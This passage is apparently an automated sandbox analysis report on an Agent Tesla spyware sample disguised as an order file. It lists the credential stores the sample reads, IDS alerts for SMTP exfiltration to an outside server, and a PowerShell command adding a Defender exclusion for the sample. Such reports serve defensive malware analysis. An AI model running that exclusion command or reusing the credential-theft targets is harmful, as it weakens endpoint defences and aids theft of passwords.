                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: JDownloader 2.0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: JDownloader 2.0\cfg
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: JDownloader 2.0\cfg
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Paltalk
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: nickname
                      Source: order2024-10-07_174915.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: order2024-10-07_174915.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: fSYT.pdbSHA256Q source: order2024-10-07_174915.exe
                      Source: Binary string: fSYT.pdb source: order2024-10-07_174915.exe

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49704 -> 199.79.62.115:587
                      Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.7:49704 -> 199.79.62.115:587
                      Source: global trafficTCP traffic: 192.168.2.7:49704 -> 199.79.62.115:587
                      Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                      Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                      Source: global trafficTCP traffic: 192.168.2.7:49704 -> 199.79.62.115:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                      Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                      Source: order2024-10-07_174915.exe, 00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                      Source: order2024-10-07_174915.exe, 00000000.00000002.1277438548.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: order2024-10-07_174915.exe
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_0165D55C0_2_0165D55C
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_059098380_2_05909838
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_059098480_2_05909848
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA90D00_2_07AA90D0
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA4F800_2_07AA4F80
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA4F700_2_07AA4F70
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA34A00_2_07AA34A0
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA34930_2_07AA3493
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA2C300_2_07AA2C30
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA2C0F0_2_07AA2C0F
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA4B480_2_07AA4B48
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 0_2_07AA30680_2_07AA3068
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_02C6E1C08_2_02C6E1C0
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_02C641408_2_02C64140
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_02C64D588_2_02C64D58
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_02C644888_2_02C64488
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_02C61D048_2_02C61D04
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065A1CB08_2_065A1CB0
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065A39188_2_065A3918
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C5F888_2_065C5F88
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065CE5088_2_065CE508
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C82688_2_065C8268
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C92A88_2_065C92A8
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C43708_2_065C4370
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065CABD08_2_065CABD0
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeCode function: 8_2_065C89F08_2_065C89F0
                      Source: order2024-10-07_174915.exe, 00000000.00000002.1276172729.000000000154E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exe, 00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exe, 00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exe, 00000000.00000002.1286419400.00000000079F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exe, 00000000.00000002.1277438548.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exe, 00000008.00000002.2501932436.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exe, 00000008.00000002.2502232905.0000000000F39000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exeBinary or memory string: OriginalFilenamefSYT.exe8 vs order2024-10-07_174915.exe
                      Source: order2024-10-07_174915.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: order2024-10-07_174915.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, cDSfec1lfX3MVo74qR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, URUyb8YnygvhLJ7Xqm.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack, cDSfec1lfX3MVo74qR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack, cDSfec1lfX3MVo74qR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/6@2/1
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order2024-10-07_174915.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4340:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqwlcwdx.z15.ps1Jump to behavior
                      Source: order2024-10-07_174915.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: order2024-10-07_174915.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: order2024-10-07_174915.exeReversingLabs: Detection: 52%
                      Source: unknownProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: order2024-10-07_174915.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: order2024-10-07_174915.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: order2024-10-07_174915.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: fSYT.pdbSHA256Q source: order2024-10-07_174915.exe
                      Source: Binary string: fSYT.pdb source: order2024-10-07_174915.exe

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
